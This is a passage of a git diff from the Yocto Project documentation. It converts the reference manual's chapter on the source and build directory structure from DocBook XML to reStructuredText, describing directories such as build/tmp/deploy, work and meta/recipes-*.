+the build system's output. The :term:`TMPDIR` variable
+points to this directory.
+
+BitBake creates this directory if it does not exist. As a last resort,
+to clean up a build and start it from scratch (other than the
+downloads), you can remove everything in the ``tmp`` directory or get
+rid of the directory completely. If you do, you should also completely
+remove the ``build/sstate-cache`` directory.
+
+.. _structure-build-tmp-buildstats:
+
+``build/tmp/buildstats/``
+-------------------------
+
+This directory stores the build statistics.
+
+.. _structure-build-tmp-cache:
+
+``build/tmp/cache/``
+--------------------
+
+When BitBake parses the metadata (recipes and configuration files), it
+caches the results in ``build/tmp/cache/`` to speed up future builds.
+The results are stored on a per-machine basis.
+
+During subsequent builds, BitBake checks each recipe (together with, for
+example, any files included or appended to it) to see if they have been
+modified. Changes can be detected, for example, through file
+modification time (mtime) changes and hashing of file contents. If no
+changes to the file are detected, then the parsed result stored in the
+cache is reused. If the file has changed, it is reparsed.
+
+.. _structure-build-tmp-deploy:
+
+``build/tmp/deploy/``
+---------------------
+
+This directory contains any "end result" output from the OpenEmbedded
+build process. The :term:`DEPLOY_DIR` variable points
+to this directory. For more detail on the contents of the ``deploy``
+directory, see the
+":ref:`images-dev-environment`" and
+":ref:`sdk-dev-environment`" sections in the Yocto
+Project Overview and Concepts Manual.
+
+.. _structure-build-tmp-deploy-deb:
+
+``build/tmp/deploy/deb/``
+-------------------------
+
+This directory receives any ``.deb`` packages produced by the build
+process. The packages are sorted into feeds for different architecture
+types.
+
+.. _structure-build-tmp-deploy-rpm:
+
+``build/tmp/deploy/rpm/``
+-------------------------
+
+This directory receives any ``.rpm`` packages produced by the build
+process. The packages are sorted into feeds for different architecture
+types.
+
+.. _structure-build-tmp-deploy-ipk:
+
+``build/tmp/deploy/ipk/``
+-------------------------
+
+This directory receives ``.ipk`` packages produced by the build process.
+
+.. _structure-build-tmp-deploy-licenses:
+
+``build/tmp/deploy/licenses/``
+------------------------------
+
+This directory receives package licensing information. For example, the
+directory contains sub-directories for ``bash``, ``busybox``, and
+``glibc`` (among others) that in turn contain appropriate ``COPYING``
+license files with other licensing information. For information on
+licensing, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _structure-build-tmp-deploy-images:
+
+``build/tmp/deploy/images/``
+----------------------------
+
+This directory is populated with the basic output objects of the build
+(think of them as the "generated artifacts" of the build process),
+including things like the boot loader image, kernel, root filesystem and
+more. If you want to flash the resulting image from a build onto a
+device, look here for the necessary components.
+
+Be careful when deleting files in this directory. You can safely delete
+old images from this directory (e.g. ``core-image-*``). However, the
+kernel (``*zImage*``, ``*uImage*``, etc.), bootloader and other
+supplementary files might be deployed here prior to building an image.
+Because these files are not directly produced from the image, if you
+delete them they will not be automatically re-created when you build the
+image again.
+
+If you do accidentally delete files here, you will need to force them to
+be re-created. In order to do that, you will need to know the target
+that produced them. For example, these commands rebuild and re-create
+the kernel files:
+::
+
+ $ bitbake -c clean virtual/kernel
+ $ bitbake virtual/kernel
+
+.. _structure-build-tmp-deploy-sdk:
+
+``build/tmp/deploy/sdk/``
+-------------------------
+
+The OpenEmbedded build system creates this directory to hold toolchain
+installer scripts which, when executed, install the sysroot that matches
+your target hardware. You can find out more about these installers in
+the ":ref:`sdk-manual/sdk-appendix-obtain:building an sdk installer`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) manual.
+
+.. _structure-build-tmp-sstate-control:
+
+``build/tmp/sstate-control/``
+-----------------------------
+
+The OpenEmbedded build system uses this directory for the shared state
+manifest files. The shared state code uses these files to record the
+files installed by each sstate task so that the files can be removed
+when cleaning the recipe or when a newer version is about to be
+installed. The build system also uses the manifests to detect and
+produce a warning when files from one task are overwriting those from
+another.
+
+.. _structure-build-tmp-sysroots-components:
+
+``build/tmp/sysroots-components/``
+----------------------------------
+
+This directory is the location of the sysroot contents that the task
+:ref:`ref-tasks-prepare_recipe_sysroot`
+links or copies into the recipe-specific sysroot for each recipe listed
+in :term:`DEPENDS`. Population of this directory is
+handled through shared state, while the path is specified by the
+:term:`COMPONENTS_DIR` variable. Apart from a few
+unusual circumstances, handling of the ``sysroots-components`` directory
+should be automatic, and recipes should not directly reference
+``build/tmp/sysroots-components``.
+
+.. _structure-build-tmp-sysroots:
+
+``build/tmp/sysroots/``
+-----------------------
+
+Previous versions of the OpenEmbedded build system used to create a
+global shared sysroot per machine along with a native sysroot. Beginning
+with the 2.3 version of the Yocto Project, sysroots exist in
+recipe-specific :term:`WORKDIR` directories. Thus, the
+``build/tmp/sysroots/`` directory is unused.
+
+.. note::
+
+ The ``build/tmp/sysroots/`` directory can still be populated using the
+ ``bitbake build-sysroots`` command and can be used for compatibility in some
+ cases. However, in general it is not recommended to populate this directory.
+ Individual recipe-specific sysroots should be used.
+
+.. _structure-build-tmp-stamps:
+
+``build/tmp/stamps/``
+---------------------
+
+This directory holds information that BitBake uses for accounting
+purposes to track what tasks have run and when they have run. The
+directory is sub-divided by architecture, package name, and version.
+Following is an example:
+::
+
+ stamps/all-poky-linux/distcc-config/1.0-r0.do_build-2fdd....2do
+
+Although the files in the directory are empty of data, BitBake uses the filenames
+and timestamps for tracking purposes.
+
+For information on how BitBake uses stamp files to determine if a task
+should be rerun, see the
+":ref:`overview-manual/overview-manual-concepts:stamp files and the rerunning of tasks`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _structure-build-tmp-log:
+
+``build/tmp/log/``
+------------------
+
+This directory contains general logs that are not otherwise placed using
+the package's ``WORKDIR``. Examples of logs are the output from the
+``do_check_pkg`` or ``do_distro_check`` tasks. Running a build does not
+necessarily mean this directory is created.
+
+.. _structure-build-tmp-work:
+
+``build/tmp/work/``
+-------------------
+
+This directory contains architecture-specific work sub-directories for
+packages built by BitBake. All tasks execute from the appropriate work
+directory. For example, the source for a particular package is unpacked,
+patched, configured and compiled all within its own work directory.
+Within the work directory, organization is based on the package group
+and version for which the source is being compiled as defined by the
+:term:`WORKDIR`.
+
+It is worth considering the structure of a typical work directory. As an
+example, consider ``linux-yocto-kernel-3.0`` on the machine ``qemux86``
+built within the Yocto Project. For this package, a work directory of
+``tmp/work/qemux86-poky-linux/linux-yocto/3.0+git1+<.....>``, referred
+to as the ``WORKDIR``, is created. Within this directory, the source is
+unpacked to ``linux-qemux86-standard-build`` and then patched by Quilt.
+(See the ":ref:`using-a-quilt-workflow`" section in
+the Yocto Project Development Tasks Manual for more information.) Within
+the ``linux-qemux86-standard-build`` directory, standard Quilt
+directories ``linux-3.0/patches`` and ``linux-3.0/.pc`` are created, and
+standard Quilt commands can be used.
+
+There are other directories generated within ``WORKDIR``. The most
+important directory is ``WORKDIR/temp/``, which has log files for each
+task (``log.do_*.pid``) and contains the scripts BitBake runs for each
+task (``run.do_*.pid``). The ``WORKDIR/image/`` directory is where "make
+install" places its output that is then split into sub-packages within
+``WORKDIR/packages-split/``.
+
+.. _structure-build-tmp-work-tunearch-recipename-version:
+
+``build/tmp/work/tunearch/recipename/version/``
+-----------------------------------------------
+
+The recipe work directory - ``${WORKDIR}``.
+
+As described earlier in the
+":ref:`structure-build-tmp-sysroots`" section,
+beginning with the 2.3 release of the Yocto Project, the OpenEmbedded
+build system builds each recipe in its own work directory (i.e.
+:term:`WORKDIR`). The path to the work directory is
+constructed using the architecture of the given build (e.g.
+:term:`TUNE_PKGARCH`, :term:`MACHINE_ARCH`, or "allarch"), the recipe
+name, and the version of the recipe (i.e.
+:term:`PE`\ ``:``\ :term:`PV`\ ``-``\ :term:`PR`).
+
+A number of key subdirectories exist within each recipe work directory:
+
+- ``${WORKDIR}/temp``: Contains the log files of each task executed for
+ this recipe, the "run" files for each executed task, which contain
+ the code run, and a ``log.task_order`` file, which lists the order in
+ which tasks were executed.
+
+- ``${WORKDIR}/image``: Contains the output of the
+ :ref:`ref-tasks-install` task, which corresponds to
+ the ``${``\ :term:`D`\ ``}`` variable in that task.
+
+- ``${WORKDIR}/pseudo``: Contains the pseudo database and log for any
+ tasks executed under pseudo for the recipe.
+
+- ``${WORKDIR}/sysroot-destdir``: Contains the output of the
+ :ref:`ref-tasks-populate_sysroot` task.
+
+- ``${WORKDIR}/package``: Contains the output of the
+ :ref:`ref-tasks-package` task before the output is
+ split into individual packages.
+
+- ``${WORKDIR}/packages-split``: Contains the output of the
+ ``do_package`` task after the output has been split into individual
+ packages. Subdirectories exist for each individual package created by
+ the recipe.
+
+- ``${WORKDIR}/recipe-sysroot``: A directory populated with the target
+ dependencies of the recipe. This directory looks like the target
+ filesystem and contains libraries that the recipe might need to link
+ against (e.g. the C library).
+
+- ``${WORKDIR}/recipe-sysroot-native``: A directory populated with the
+ native dependencies of the recipe. This directory contains the tools
+ the recipe needs to build (e.g. the compiler, Autoconf, libtool, and
+ so forth).
+
+- ``${WORKDIR}/build``: This subdirectory applies only to recipes that
+ support builds where the source is separate from the build artifacts.
+ The OpenEmbedded build system uses this directory as a separate build
+ directory (i.e. ``${``\ :term:`B`\ ``}``).
+
+.. _structure-build-work-shared:
+
+``build/tmp/work-shared/``
+--------------------------
+
+For efficiency, the OpenEmbedded build system creates and uses this
+directory to hold recipes that share a work directory with other
+recipes. In practice, this is only used for ``gcc`` and its variants
+(e.g. ``gcc-cross``, ``libgcc``, ``gcc-runtime``, and so forth).
+
+.. _structure-meta:
+
+The Metadata - ``meta/``
+========================
+
+As mentioned previously, :term:`Metadata` is the core of the
+Yocto Project. Metadata has several important subdivisions:
+
+.. _structure-meta-classes:
+
+``meta/classes/``
+-----------------
+
+This directory contains the ``*.bbclass`` files. Class files are used to
+abstract common code so it can be reused by multiple packages. Every
+package inherits the ``base.bbclass`` file. Examples of other important
+classes are ``autotools.bbclass``, which in theory allows any
+Autotool-enabled package to work with the Yocto Project with minimal
+effort. Another example is ``kernel.bbclass`` that contains common code
+and functions for working with the Linux kernel. Functions like image
+generation or packaging also have their specific class files such as
+``image.bbclass``, ``rootfs_*.bbclass`` and ``package*.bbclass``.
+
+For reference information on classes, see the
+":ref:`ref-manual/ref-classes:Classes`" chapter.
+
+.. _structure-meta-conf:
+
+``meta/conf/``
+--------------
+
+This directory contains the core set of configuration files that start
+from ``bitbake.conf`` and from which all other configuration files are
+included. See the include statements at the end of the ``bitbake.conf``
+file and you will note that even ``local.conf`` is loaded from there.
+While ``bitbake.conf`` sets up the defaults, you can often override
+these by using the (``local.conf``) file, machine file or the
+distribution configuration file.
+
+.. _structure-meta-conf-machine:
+
+``meta/conf/machine/``
+----------------------
+
+This directory contains all the machine configuration files. If you set
+``MACHINE = "qemux86"``, the OpenEmbedded build system looks for a
+``qemux86.conf`` file in this directory. The ``include`` directory
+contains various data common to multiple machines. If you want to add
+support for a new machine to the Yocto Project, look in this directory.
+
+.. _structure-meta-conf-distro:
+
+``meta/conf/distro/``
+---------------------
+
+The contents of this directory controls any distribution-specific
+configurations. For the Yocto Project, the ``defaultsetup.conf`` is the
+main file here. This directory includes the versions and the ``SRCDATE``
+definitions for applications that are configured here. An example of an
+alternative configuration might be ``poky-bleeding.conf``. Although this
+file mainly inherits its configuration from Poky.
+
+.. _structure-meta-conf-machine-sdk:
+
+``meta/conf/machine-sdk/``
+--------------------------
+
+The OpenEmbedded build system searches this directory for configuration
+files that correspond to the value of
+:term:`SDKMACHINE`. By default, 32-bit and 64-bit x86
+files ship with the Yocto Project that support some SDK hosts. However,
+it is possible to extend that support to other SDK hosts by adding
+additional configuration files in this subdirectory within another
+layer.
+
+.. _structure-meta-files:
+
+``meta/files/``
+---------------
+
+This directory contains common license files and several text files used
+by the build system. The text files contain minimal device information
+and lists of files and directories with known permissions.
+
+.. _structure-meta-lib:
+
+``meta/lib/``
+-------------
+
+This directory contains OpenEmbedded Python library code used during the
+build process.
+
+.. _structure-meta-recipes-bsp:
+
+``meta/recipes-bsp/``
+---------------------
+
+This directory contains anything linking to specific hardware or
+hardware configuration information such as "u-boot" and "grub".
+
+.. _structure-meta-recipes-connectivity:
+
+``meta/recipes-connectivity/``
+------------------------------
+
+This directory contains libraries and applications related to
+communication with other devices.
+
+.. _structure-meta-recipes-core:
+
+``meta/recipes-core/``
+----------------------
+
+This directory contains what is needed to build a basic working Linux
+image including commonly used dependencies.
+
+.. _structure-meta-recipes-devtools:
+
+``meta/recipes-devtools/``
+--------------------------
+
+This directory contains tools that are primarily used by the build
+system. The tools, however, can also be used on targets.
+
+.. _structure-meta-recipes-extended:
+
+``meta/recipes-extended/``
+--------------------------
+
+This directory contains non-essential applications that add features
+compared to the alternatives in core. You might need this directory for
+full tool functionality or for Linux Standard Base (LSB) compliance.
+
+.. _structure-meta-recipes-gnome:
+
+``meta/recipes-gnome/``
+-----------------------
+
+This directory contains all things related to the GTK+ application
+framework.
+
+.. _structure-meta-recipes-graphics:
+
+``meta/recipes-graphics/``
+--------------------------
+
+This directory contains X and other graphically related system
+libraries.
+
+.. _structure-meta-recipes-kernel:
+
+``meta/recipes-kernel/``
+------------------------
+
+This directory contains the kernel and generic applications and
+libraries that have strong kernel dependencies.
+
+.. _structure-meta-recipes-lsb4:
+
+``meta/recipes-lsb4/``
+----------------------
+
+This directory contains recipes specifically added to support the Linux
+Standard Base (LSB) version 4.x.
+
+.. _structure-meta-recipes-multimedia:
+
+``meta/recipes-multimedia/``
+----------------------------
+
+This directory contains codecs and support utilities for audio, images
+and video.
+
+.. _structure-meta-recipes-rt:
+
+``meta/recipes-rt/``
+--------------------
+
+This directory contains package and image recipes for using and testing
+the ``PREEMPT_RT`` kernel.
+
+.. _structure-meta-recipes-sato:
+
+``meta/recipes-sato/``
+----------------------
+
+This directory contains the Sato demo/reference UI/UX and its associated
+applications and configuration data.
+
+.. _structure-meta-recipes-support:
+
+``meta/recipes-support/``
+-------------------------
+
+This directory contains recipes used by other recipes, but that are not
+directly included in images (i.e. dependencies of other recipes).
+
+.. _structure-meta-site:
+
+``meta/site/``
+--------------
+
+This directory contains a list of cached results for various
+architectures. Because certain "autoconf" test results cannot be
+determined when cross-compiling due to the tests not able to run on a
+live system, the information in this directory is passed to "autoconf"
+for the various architectures.
+
+.. _structure-meta-recipes-txt:
+
+``meta/recipes.txt``
+--------------------
+
+This file is a description of the contents of ``recipes-*``.
diff --git a/documentation/ref-manual/ref-structure.xml b/documentation/ref-manual/ref-structure.xml
deleted file mode 100644
index 27f17dd919..0000000000
--- a/documentation/ref-manual/ref-structure.xml
+++ /dev/null
@@ -1,1122 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-structure'>
-
-<title>Source Directory Structure</title>
-
-<para>
- The <link linkend='source-directory'>Source Directory</link>
- consists of numerous files, directories and subdirectories;
- understanding their locations and contents is key to using the
- Yocto Project effectively.
- This chapter describes the Source Directory and gives information about
- those files and directories.
-</para>
-
-<para>
- For information on how to establish a local Source Directory on your
- development system, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#locating-yocto-project-source-files'>Locating Yocto Project Source Files</ulink>"
- section in the Yocto Project Development Tasks Manual.
-</para>
-
- <note>
- The OpenEmbedded build system does not support file or directory names that
- contain spaces.
- Be sure that the Source Directory you use does not contain these types
- of names.
- </note>
-
-<section id='structure-core'>
- <title>Top-Level Core Components</title>
-
- <para>
- This section describes the top-level components of the
- <link linkend='source-directory'>Source Directory</link>.
- </para>
-
- <section id='structure-core-bitbake'>
- <title><filename>bitbake/</filename></title>
-
- <para>
- This directory includes a copy of BitBake for ease of use.
- The copy usually matches the current stable BitBake release from
- the BitBake project.
- BitBake, a
- <link linkend='metadata'>Metadata</link>
- interpreter, reads the Yocto Project Metadata and runs the tasks
- defined by that data.
- Failures are usually caused by errors in your Metadata and not from BitBake itself;
- consequently, most users do not need to worry about BitBake.
- </para>
-
- <para>
- When you run the <filename>bitbake</filename> command, the
- main BitBake executable (which resides in the
- <filename>bitbake/bin/</filename> directory) starts.
- Sourcing the environment setup script (i.e.
- <link linkend="structure-core-script"><filename>&OE_INIT_FILE;</filename></link>)
- places the <filename>scripts/</filename> and
- <filename>bitbake/bin/</filename> directories (in that order) into
- the shell's <filename>PATH</filename> environment variable.
- </para>
-
- <para>
- For more information on BitBake, see the
- <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
- </para>
- </section>
-
- <section id='structure-core-build'>
- <title><filename>build/</filename></title>
-
- <para>
- This directory contains user configuration files and the output
- generated by the OpenEmbedded build system in its standard configuration where
- the source tree is combined with the output.
- The
- <link linkend='build-directory'>Build Directory</link>
- is created initially when you <filename>source</filename>
- the OpenEmbedded build environment setup script
- (i.e.
- <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>).
- </para>
-
- <para>
- It is also possible to place output and configuration
- files in a directory separate from the
- <link linkend='source-directory'>Source Directory</link>
- by providing a directory name when you <filename>source</filename>
- the setup script.
- For information on separating output from your local
- Source Directory files (commonly described as an "out of tree" build), see the
- "<link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>"
- section.
- </para>
- </section>
-
- <section id='handbook'>
- <title><filename>documentation/</filename></title>
-
- <para>
- This directory holds the source for the Yocto Project documentation
- as well as templates and tools that allow you to generate PDF and HTML
- versions of the manuals.
- Each manual is contained in its own sub-folder;
- for example, the files for this reference manual reside in
- the <filename>ref-manual/</filename> directory.
- </para>
- </section>
-
- <section id='structure-core-meta'>
- <title><filename>meta/</filename></title>
-
- <para>
- This directory contains the minimal, underlying OpenEmbedded-Core metadata.
- The directory holds recipes, common classes, and machine
- configuration for strictly emulated targets (<filename>qemux86</filename>,
- <filename>qemuarm</filename>, and so forth.)
- </para>
- </section>
-
- <section id='structure-core-meta-poky'>
- <title><filename>meta-poky/</filename></title>
-
- <para>
- Designed above the <filename>meta/</filename> content, this directory
- adds just enough metadata to define the Poky reference distribution.
- </para>
- </section>
-
- <section id='structure-core-meta-yocto-bsp'>
- <title><filename>meta-yocto-bsp/</filename></title>
-
- <para>
- This directory contains the Yocto Project reference
- hardware Board Support Packages (BSPs).
- For more information on BSPs, see the
- <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
- </para>
- </section>
-
- <section id='structure-meta-selftest'>
- <title><filename>meta-selftest/</filename></title>
-
- <para>
- This directory adds additional recipes and append files
- used by the OpenEmbedded selftests to verify the behavior
- of the build system.
- You do not have to add this layer to your
- <filename>bblayers.conf</filename> file unless you want to run the
- selftests.
- </para>
- </section>
-
- <section id='structure-meta-skeleton'>
- <title><filename>meta-skeleton/</filename></title>
-
- <para>
- This directory contains template recipes for BSP and kernel development.
- </para>
- </section>
-
- <section id='structure-core-scripts'>
- <title><filename>scripts/</filename></title>
-
- <para>
- This directory contains various integration scripts that implement
- extra functionality in the Yocto Project environment (e.g. QEMU scripts).
- The <link linkend="structure-core-script"><filename>&OE_INIT_FILE;</filename></link>
- script prepends this directory to the shell's
- <filename>PATH</filename> environment variable.
- </para>
-
- <para>
- The <filename>scripts</filename> directory has useful scripts that assist in contributing
- back to the Yocto Project, such as <filename>create-pull-request</filename> and
- <filename>send-pull-request</filename>.
- </para>
- </section>
-
- <section id='structure-core-script'>
- <title><filename>&OE_INIT_FILE;</filename></title>
-
- <para>
- This script sets up the OpenEmbedded build environment.
- Running this script with the <filename>source</filename> command in
- a shell makes changes to <filename>PATH</filename> and sets other
- core BitBake variables based on the current working directory.
- You need to run an environment setup script before running BitBake
- commands.
- The script uses other scripts within the
- <filename>scripts</filename> directory to do the bulk of the work.
- </para>
-
- <para>
- When you run this script, your Yocto Project environment is set
- up, a
- <link linkend='build-directory'>Build Directory</link>
- is created, your working directory becomes the Build Directory,
- and you are presented with some simple suggestions as to what to do
- next, including a list of some possible targets to build.
- Here is an example:
- <literallayout class='monospaced'>
- $ source oe-init-build-env
-
- ### Shell environment set up for builds. ###
-
- You can now run 'bitbake &lt;target&gt;'
-
- Common targets are:
- core-image-minimal
- core-image-sato
- meta-toolchain
- meta-ide-support
-
- You can also run generated qemu images with a command like 'runqemu qemux86-64'
- </literallayout>
- The default output of the <filename>oe-init-build-env</filename> script
- is from the <filename>conf-notes.txt</filename> file, which is found in the
- <filename>meta-poky</filename> directory within the
- <link linkend='source-directory'>Source Directory</link>.
- If you design a custom distribution, you can include your own version
- of this configuration file to mention the targets defined by your
- distribution.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-custom-template-configuration-directory'>Creating a Custom Template Configuration Directory</ulink>"
- section in the Yocto Project Development Tasks Manual for more
- information.
- </para>
-
- <para>
- By default, running this script without a Build Directory
- argument creates the <filename>build/</filename> directory
- in your current working directory.
- If you provide a Build Directory argument when you
- <filename>source</filename> the script, you direct the OpenEmbedded
- build system to create a Build Directory of your choice.
- For example, the following command creates a Build Directory named
- <filename>mybuilds/</filename> that is outside of the
- <link linkend='source-directory'>Source Directory</link>:
- <literallayout class='monospaced'>
- $ source &OE_INIT_FILE; ~/mybuilds
- </literallayout>
- The OpenEmbedded build system uses the template configuration
- files, which are found by default in the
- <filename>meta-poky/conf/</filename> directory in the
- Source Directory.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-custom-template-configuration-directory'>Creating a Custom Template Configuration Directory</ulink>"
- section in the Yocto Project Development Tasks Manual for more
- information.
- <note>
- The OpenEmbedded build system does not support file or directory names that
- contain spaces.
- If you attempt to run the <filename>&OE_INIT_FILE;</filename> script
- from a Source Directory that contains spaces in either the filenames
- or directory names, the script returns an error indicating no such
- file or directory.
- Be sure to use a Source Directory free of names containing spaces.
- </note>
- </para>
- </section>
-
- <section id='structure-basic-top-level'>
- <title><filename>LICENSE, README, and README.hardware</filename></title>
-
- <para>
- These files are standard top-level files.
- </para>
- </section>
-</section>
-
-<section id='structure-build'>
- <title>The Build Directory - <filename>build/</filename></title>
-
- <para>
- The OpenEmbedded build system creates the
- <link linkend='build-directory'>Build Directory</link>
- when you run the build environment setup script
- <link
-linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>.
- If you do not give the Build Directory a specific name when you run
- the setup script, the name defaults to <filename>build/</filename>.
- </para>
-
- <para>
- For subsequent parsing and processing, the name of the Build
- directory is available via the
- <link linkend='var-TOPDIR'><filename>TOPDIR</filename></link> variable.
- </para>
-
- <section id='structure-build-buildhistory'>
- <title><filename>build/buildhistory/</filename></title>
-
- <para>
- The OpenEmbedded build system creates this directory when you
- enable build history via the <filename>buildhistory</filename> class file.
- The directory organizes build information into image, packages, and
- SDK subdirectories.
- For information on the build history feature, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Maintaining Build Output Quality</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='structure-build-conf-local.conf'>
- <title><filename>build/conf/local.conf</filename></title>
-
- <para>
- This configuration file contains all the local user configurations
- for your build environment.
- The <filename>local.conf</filename> file contains documentation on
- the various configuration options.
- Any variable set here overrides any variable set elsewhere within
- the environment unless that variable is hard-coded within a file
- (e.g. by using '=' instead of '?=').
- Some variables are hard-coded for various reasons but such
- variables are relatively rare.
- </para>
-
- <para>
- At a minimum, you would normally edit this file to select the target
- <filename><link linkend='var-MACHINE'>MACHINE</link></filename>,
- which package types you wish to use
- (<link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>),
- and the location from which you want to access downloaded files
- (<filename><link linkend='var-DL_DIR'>DL_DIR</link></filename>).
- </para>
-
- <para>
- If <filename>local.conf</filename> is not present when you
- start the build, the OpenEmbedded build system creates it from
- <filename>local.conf.sample</filename> when
- you <filename>source</filename> the top-level build environment
- setup script
- <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>.
- </para>
-
- <para>
- The source <filename>local.conf.sample</filename> file used
- depends on the <filename>$TEMPLATECONF</filename> script variable,
- which defaults to <filename>meta-poky/conf/</filename>
- when you are building from the Yocto Project development
- environment, and to <filename>meta/conf/</filename> when
- you are building from the OpenEmbedded-Core environment.
- Because the script variable points to the source of the
- <filename>local.conf.sample</filename> file, this implies that
- you can configure your build environment from any layer by setting
- the variable in the top-level build environment setup script as
- follows:
- <literallayout class='monospaced'>
- TEMPLATECONF=<replaceable>your_layer</replaceable>/conf
- </literallayout>
- Once the build process gets the sample file, it uses
- <filename>sed</filename> to substitute final
- <filename>${</filename><link linkend='var-OEROOT'><filename>OEROOT</filename></link><filename>}</filename>
- values for all <filename>##OEROOT##</filename> values.
- <note>
- You can see how the <filename>TEMPLATECONF</filename> variable
- is used by looking at the
- <filename>scripts/oe-setup-builddir</filename> script in the
- <link linkend='source-directory'>Source Directory</link>.
- You can find the Yocto Project version of the
- <filename>local.conf.sample</filename> file in the
- <filename>meta-poky/conf</filename> directory.
- </note>
- </para>
- </section>
-
- <section id='structure-build-conf-bblayers.conf'>
- <title><filename>build/conf/bblayers.conf</filename></title>
-
- <para>
- This configuration file defines
- <ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>layers</ulink>,
- which are directory trees, traversed (or walked) by BitBake.
- The <filename>bblayers.conf</filename> file uses the
- <link linkend='var-BBLAYERS'><filename>BBLAYERS</filename></link>
- variable to list the layers BitBake tries to find.
- </para>
-
- <para>
- If <filename>bblayers.conf</filename> is not present when you
- start the build, the OpenEmbedded build system creates it from
- <filename>bblayers.conf.sample</filename> when
- you <filename>source</filename> the top-level build environment
- setup script (i.e.
- <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>).
- </para>
-
- <para>
- As with the <filename>local.conf</filename> file,
- the source <filename>bblayers.conf.sample</filename> file used
- depends on the <filename>$TEMPLATECONF</filename> script variable,
- which defaults to <filename>meta-poky/conf/</filename>
- when you are building from the Yocto Project development
- environment, and to <filename>meta/conf/</filename> when
- you are building from the OpenEmbedded-Core environment.
- Because the script variable points to the source of the
- <filename>bblayers.conf.sample</filename> file, this implies that
- you can base your build from any layer by setting the variable in
- the top-level build environment setup script as follows:
- <literallayout class='monospaced'>
- TEMPLATECONF=<replaceable>your_layer</replaceable>/conf
- </literallayout>
- Once the build process gets the sample file, it uses
- <filename>sed</filename> to substitute final
- <filename>${</filename><link linkend='var-OEROOT'><filename>OEROOT</filename></link><filename>}</filename>
- values for all <filename>##OEROOT##</filename> values.
- <note>
- You can see how the <filename>TEMPLATECONF</filename> variable
- <filename>scripts/oe-setup-builddir</filename> script in the
- <link linkend='source-directory'>Source Directory</link>.
- You can find the Yocto Project version of the
- <filename>bblayers.conf.sample</filename> file in the
- <filename>meta-poky/conf/</filename> directory.
- </note>
- </para>
- </section>
-
- <section id='structure-build-conf-sanity_info'>
- <title><filename>build/cache/sanity_info</filename></title>
-
- <para>
- This file indicates the state of the sanity checks and is created
- during the build.
- </para>
- </section>
-
- <section id='structure-build-downloads'>
- <title><filename>build/downloads/</filename></title>
-
- <para>
- This directory contains downloaded upstream source tarballs.
- You can reuse the directory for multiple builds or move
- the directory to another location.
- You can control the location of this directory through the
- <filename><link linkend='var-DL_DIR'>DL_DIR</link></filename> variable.
- </para>
- </section>
-
- <section id='structure-build-sstate-cache'>
- <title><filename>build/sstate-cache/</filename></title>
-
- <para>
- This directory contains the shared state cache.
- You can reuse the directory for multiple builds or move
- the directory to another location.
- You can control the location of this directory through the
- <filename><link linkend='var-SSTATE_DIR'>SSTATE_DIR</link></filename> variable.
- </para>
- </section>
-
- <section id='structure-build-tmp'>
- <title><filename>build/tmp/</filename></title>
-
- <para>
- The OpenEmbedded build system creates and uses this directory
- for all the build system's output.
- The
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
- variable points to this directory.
- </para>
-
- <para>
- BitBake creates this directory if it does not exist.
- As a last resort, to clean up a build and start it from scratch
- (other than the downloads), you can remove everything in the
- <filename>tmp</filename> directory or get rid of the
- directory completely.
- If you do, you should also completely remove the
- <filename>build/sstate-cache</filename> directory.
- </para>
- </section>
-
- <section id='structure-build-tmp-buildstats'>
- <title><filename>build/tmp/buildstats/</filename></title>
-
- <para>
- This directory stores the build statistics.
- </para>
- </section>
-
- <section id='structure-build-tmp-cache'>
- <title><filename>build/tmp/cache/</filename></title>
-
- <para>
- When BitBake parses the metadata (recipes and configuration files),
- it caches the results in <filename>build/tmp/cache/</filename>
- to speed up future builds.
- The results are stored on a per-machine basis.
- </para>
-
- <para>
- During subsequent builds, BitBake checks each recipe (together
- with, for example, any files included or appended to it) to see
- if they have been modified.
- Changes can be detected, for example, through file modification
- time (mtime) changes and hashing of file contents.
- If no changes to the file are detected, then the parsed result
- stored in the cache is reused.
- If the file has changed, it is reparsed.
- </para>
- </section>
-
- <section id='structure-build-tmp-deploy'>
- <title><filename>build/tmp/deploy/</filename></title>
-
- <para>
- This directory contains any "end result" output from the
- OpenEmbedded build process.
- The <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>
- variable points to this directory.
- For more detail on the contents of the <filename>deploy</filename>
- directory, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#images-dev-environment'>Images</ulink>"
- and
- "<ulink url='&YOCTO_DOCS_OM_URL;#sdk-dev-environment'>Application Development SDK</ulink>"
- sections in the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='structure-build-tmp-deploy-deb'>
- <title><filename>build/tmp/deploy/deb/</filename></title>
-
- <para>
- This directory receives any <filename>.deb</filename> packages produced by
- the build process.
- The packages are sorted into feeds for different architecture types.
- </para>
- </section>
-
- <section id='structure-build-tmp-deploy-rpm'>
- <title><filename>build/tmp/deploy/rpm/</filename></title>
-
- <para>
- This directory receives any <filename>.rpm</filename> packages produced by
- the build process.
- The packages are sorted into feeds for different architecture types.
- </para>
- </section>
